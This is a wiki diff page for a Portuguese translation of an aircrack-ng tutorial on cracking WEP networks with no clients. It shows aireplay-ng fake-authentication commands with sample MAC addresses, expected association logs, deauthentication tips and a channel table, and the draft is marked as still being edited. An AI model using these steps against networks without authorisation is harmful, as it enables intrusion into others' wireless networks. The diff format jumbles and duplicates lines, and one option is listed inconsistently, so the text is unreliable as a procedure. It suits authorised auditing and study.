Ferramentas do usuário

Ferramentas do site


pt-br:how_to_crack_wep_with_no_clients

Diferenças

Aqui você vê as diferenças entre duas revisões dessa página.

Link para esta página de comparações

Próxima revisão
Revisão anterior
Última revisãoAmbos lados da revisão seguinte
pt-br:how_to_crack_wep_with_no_clients [2011/01/08 21:26] – criada rafigpt-br:how_to_crack_wep_with_no_clients [2011/01/08 22:33] rafig
Linha 1: Linha 1:
 +.
 ===== Tutorial: Como craquear WEP sem cliente wireless ===== ===== Tutorial: Como craquear WEP sem cliente wireless =====
  
Linha 99: Linha 100:
  
  
-//+
    Interface     Chipset     Driver    Interface     Chipset     Driver
  
    wifi0         Atheros     madwifi-ng    wifi0         Atheros     madwifi-ng
    ath0          Atheros     madwifi-ng VAP (parent:wifi0) (monitor mode enable)    ath0          Atheros     madwifi-ng VAP (parent:wifi0) (monitor mode enable)
-//+
  
 Você pode notar acima que “ath0” está sendo mostrado que está no modo monitor. \\ Você pode notar acima que “ath0” está sendo mostrado que está no modo monitor. \\
Linha 110: Linha 111:
  
 === O sistema responderá: === === O sistema responderá: ===
-//     lo      no     wireless extensions 
-       wifi0   no     wireless extensions  
-       eth0    no     wireless extensions  
-       ath0    IEEE   802.11g  ESSID:"" Nickname:""  
-                               Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82  
-                               Bit Rate:0 kb/s    Tx-Power:18 dBm   Sensitivity=0/ 
-                               Retry:off         RTS thr:of        Fragment thr:off  
-                               Encryption key:off  
-                               Power Management:off  
-                               Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm  
-                               Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag: 
-                               Tx excessive retries:0 Invalid misc:     Missed beacon:0 // 
  
-\\+   lo        no wireless extensions. 
 +    
 +   eth0      no wireless extensions. 
 +    
 +   wifi0     no wireless extensions. 
 +    
 +   ath0      IEEE 802.11g  ESSID:""  Nickname:"" 
 +             Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:09:5B:EC:EE:F2    
 +             Bit Rate:0 kb/s   Tx-Power:15 dBm   Sensitivity=0/  
 +             Retry:off   RTS thr:off   Fragment thr:off 
 +             Encryption key:off 
 +             Power Management:off 
 +             Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm 
 +             Rx invalid nwid: Rx invalid crypt: Rx invalid frag:0 
 +             Tx excessive retries: Invalid misc:  Missed beacon:0 
 +              
 +             
 Na resposta acima você pode ver que “ath0” está no modo monitor, com frequência de 2.452GHz  Na resposta acima você pode ver que “ath0” está no modo monitor, com frequência de 2.452GHz 
 que é o canal 9. O parâmetro “Access Point” mostra o endereço MAC da placa wireless. Somente o  que é o canal 9. O parâmetro “Access Point” mostra o endereço MAC da placa wireless. Somente o 
Linha 135: Linha 140:
 === Dicas de resolução de problemas: === === Dicas de resolução de problemas: ===
    * Se uma outra interface for levantada, diferente de ath0 ( ou diferente da interface que você estiver usando) então pare cada uma delas usando “airmon-ng stop athX” onde X é cada é a numeração para cada interface que você quer parar.    * Se uma outra interface for levantada, diferente de ath0 ( ou diferente da interface que você estiver usando) então pare cada uma delas usando “airmon-ng stop athX” onde X é cada é a numeração para cada interface que você quer parar.
-   * Em drivers baseados no drivers mac80211 o sistema irá responder conforme abaixo: \\ // +   * Em drivers baseados no drivers mac80211 o sistema irá responder conforme abaixo: \\ \\ // Interface    Chipset      Driver \\ wlan0        Broadcom     43xx      b43 – [phy0] // 
-                 Interface    Chipset      Driver \\ + 
-  + 
-                 wlan0        Broadcom     43xx      b43 – [phy0]+Para tal interface, use o nome da interface após “modo monitor habilitado em (aqui mon0)” para demais comando, ao invés de sua interface de rede atual. \\ 
 + 
 +==== Passo 3 - Usar o aireplay-ng para fazer uma autenticação falsa com o AP ==== 
 + 
 +Este é um passo muito importante. \\ 
 +Para fazer um AP aceitar pacotes, o endereço MAC de origem deverá já está associado. Se o endereço MAC de origem  que você estiver injetando não está associado então o AP ignorará os pacotes e sairá com um pacote “DeAuthentication”. Nesta condição não haverá novos pacotes IV s criados por que o AP estará ignorando todos os pacote injetados. \\ 
 +A falta de associação com o AP é a simples e grande razão por que a injeção de pacotes falhou. 
 +Para associar com o AP usando uma autenticação falsa, faça conforma abaixo, digitando na linha  de comando de seu console: \\ \\ 
 +// # aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 // 
 +\\ \\ 
 +**Onde:** 
 +  *1 -1 quer dizer autenticação falsa; 
 +  *2 0  quer dizer reassociação em segundos; 
 +  *3 -e teddy é o nome da rede wireless; 
 +  *4 -a 00:14:6C:7E:40:80 é o endereço MAC do AP; 
 +  *5 -h 00:09:5B:EC:EE:F2 é o MAC de nossa placa de rede wireless; 
 +  *6 ath0 é o nome de nossa interface de rede. 
 + 
 +**Uma associação bem sucedida se parecerá conforme abaixo:** \\ \\ 
 +// 
 +18:18:20 Sending Authentication Request \\ 
 +18:18:20 Authentication successful \\ 
 +18:18:20 Sending Association Request \\ 
 +18:18:20 Association successful :-) \\
 // //
 \\ \\
-Para tal interface, use nome da interface após “modo monitor habilitado em (aqui mon0)” para demais comando, ao invés de sua interface de rede atual\\+**Ou uma outra variação:** \\ 
 + 
 +//#aireplay-ng -1 6000 -1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 // 
 +\\ \\ 
 +**Onde: ** 
 +    - 6000 - Reautentica a cada 6000 secondos. O longo periodo também mantem o pacote ativo para ser enviado; 
 +    - -o 1 - Envia somente um conjunto de pacotes de cada vez. O padrão são multiplos pacotes porém isto confunde alguns AP.  
 +    - -q 10 – Envia pacotes ativos a cada 10 secondos. 
 + 
 +**Uma associação bem sucedida se parecerá conforme abaixo: ** \\ \\ 
 +// 
 +18:22:32 Sending Authentication Request \\ 
 +18:22:32 Authentication successful \\ 
 +18:22:32 Sending Association Request \\ 
 +18:22:32 Association successful :-\\ 
 +18:22:42 Sending keep-alive packet \\ 
 +18:22:52 Sending keep-alive packet \\ 
 +# and so on. \\ 
 +Here is an example of what a failed authentication looks like: \\ 
 +8:28:02 Sending Authentication Request \\ 
 +18:28:02 Authentication successful \\ 
 +18:28:02 Sending Association Request \\ 
 +18:28:02 Association successful :-) \\ 
 +18:28:02 Got a deauthentication packet! \\ 
 +18:28:05 Sending Authentication Request \\ 
 +18:28:05 Authentication successful \\ 
 +18:28:05 Sending Association Request \\ 
 +18:28:10 Sending Authentication Request \\ 
 +18:28:10 Authentication successful \\ 
 +18:28:10 Sending Association Request \\ 
 +// 
 +\\ \\ 
 +Note a frase “Got a deauthentication packet” e a continua tentativa acima. No prociga para os proximos passos até você ter uma autenticação falsa corretamente sendo executada. \\ 
 + 
 +=== Dica de resolução de problemas: === 
 +  - Os pacotes de desautenticação são enviados diretamente do seu PC para o cliente. Logo você deverá está fisicamente próximo ao cliente para que a transmissão de sua placa de rede wireless o alcance (alcance o cliente)Para confirmar se o cliente recebeu os pacotes de desautenticação, use o tcpdump ou similar para ver os pacotes ACK que voltaram do cliente. Se você não obteve pacotes ACK de volta, então o cliente não “ouviu” o pacote de desautenticação. 
 + 
 +AINDA EM EDIÇÃO !! 
 + 
 + 
  
 +                                            Tabela 1 
 +                               Wireless Frequencies and Channels
 +   ________________________________________________________________________________________
 +      Frequency           Channel Number                  Frequency        Channel Number
 +      2.412 GHz                1                          2.484 GHz             14 
 +      2.417 GHz                2                          5.180 GHz             36 
 +      2.422 GHz                3                          5.200 GHz             40 
 +      2.427 GHz                4                          5.220 GHz             44 
 +      2.432 GHz                5                          5.240 GHz             48 
 +      2.437 GHz                6                          5.260 GHz             52 
 +      2.442 GHz                7                          5.280 GHz             56 
 +      2.447 GHz                8                          5.300 GHz             60 
 +      2.452 GHz                9                          5.320 GHz             64 
 +      2.457 GHz                10                         5.745 GHz             149 
 +      2.462 GHz                11                         5.765 GHz             153 
 +      2.467 GHz                12                         5.785 GHz             157 
 +      2.472 GHz                13                         5.805 GHz             161 
 +   ________________________________________________________________________________________
pt-br/how_to_crack_wep_with_no_clients.txt · Última modificação: 2011/01/08 22:35 por rafig